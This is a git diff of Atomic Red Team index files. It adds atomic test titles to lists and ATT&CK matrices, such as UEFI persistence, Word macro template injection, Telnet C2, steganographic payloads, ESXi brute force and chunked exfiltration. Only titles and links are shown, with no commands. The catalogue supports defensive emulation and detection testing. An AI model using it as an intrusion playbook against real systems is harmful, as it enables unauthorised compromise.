   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
   - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
+  - Atomic Test #1: AutoIt Script Execution [windows]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1072 Software Deployment Tools](../../T1072/T1072.md)
   - Atomic Test #1: Radmin Viewer Utility [windows]
@@ -926,7 +935,8 @@
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1133 External Remote Services](../../T1133/T1133.md)
   - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
-- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
   - Atomic Test #1: Service Registry Permissions Weakness [windows]
   - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -1021,7 +1031,8 @@
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
   - Atomic Test #3: Create a new Domain Account using PowerShell [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1137.001 Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md)
+  - Atomic Test #1: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1143,7 +1154,8 @@
   - Atomic Test #4: DNS C2 [windows]
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1071 Application Layer Protocol](../../T1071/T1071.md)
+  - Atomic Test #1: Telnet C2 [windows]
 - [T1219 Remote Access Software](../../T1219/T1219.md)
   - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
   - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
@@ -1156,6 +1168,7 @@
   - Atomic Test #9: UltraViewer - RAT Execution [windows]
   - Atomic Test #10: UltraVNC Execution [windows]
   - Atomic Test #11: MSP360 Connect Execution [windows]
+  - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1217,7 +1230,9 @@
   - Atomic Test #26: Download a file using wscript [windows]
   - Atomic Test #28: Nimgrab - Transfer Files [windows]
   - Atomic Test #29: iwr or Invoke Web-Request download [windows]
-- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
+  - Atomic Test #1: Steganographic Tarball Embedding [windows]
+  - Atomic Test #2: Embedded Script in Image Execution via Extract-Invoke-PSImage [windows]
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #3: portproxy reg key [windows]
@@ -1230,6 +1245,7 @@
   - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
   - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
   - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+  - Atomic Test #10: ESXi - Remove Syslog remote IP [windows]
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #7: Windows Screencapture [windows]
   - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
@@ -1335,6 +1351,7 @@
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #8: ESXi - Brute Force Until Account Lockout [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1487,6 +1504,7 @@
   - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
   - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
   - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
 - [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
   - Atomic Test #1: Request for service tickets [windows]
   - Atomic Test #2: Rubeus kerberoast [windows]
@@ -1584,6 +1602,7 @@
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
   - Atomic Test #2: WinPwn - printercheck [windows]
+  - Atomic Test #3: Peripheral Device Discovery via fsutil [windows]
 - [T1082 System Information Discovery](../../T1082/T1082.md)
   - Atomic Test #1: System Information Discovery [windows]
   - Atomic Test #7: Hostname Discovery (Windows) [windows]
@@ -1645,6 +1664,7 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1654 Log Enumeration](../../T1654/T1654.md)
   - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
+  - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows]
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #2: Process Discovery - tasklist [windows]
   - Atomic Test #3: Process Discovery - Get-Process [windows]
@@ -1828,7 +1848,8 @@
   - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]
 - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
   - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
-- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
   - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 30b7f645..54c01f6a 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -36,7 +36,7 @@
 |  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -49,7 +49,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md
index 38cf0fd2..fc859272 100644
--- a/atomics/Indexes/Matrices/macos-matrix.md
+++ b/atomics/Indexes/Matrices/macos-matrix.md
@@ -36,7 +36,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Data Obfuscation via Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) |  | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -51,7 +51,7 @@
 |  |  |  |  | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
-|  |  |  |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 48e9480f..83540e81 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -7,18 +7,18 @@
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Replication Through Removable Media](../../T1091/T1091.md) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Group Policy Discovery](../../T1615/T1615.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Supply Chain Compromise](../../T1195/T1195.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [External Remote Services](../../T1133/T1133.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Unsecured Credentials: Cloud Instance Metadata API](../../T1552.005/T1552.005.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Access Software](../../T1219/T1219.md) | [Service Stop](../../T1489/T1489.md) |
 | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Direct Volume Access](../../T1006/T1006.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
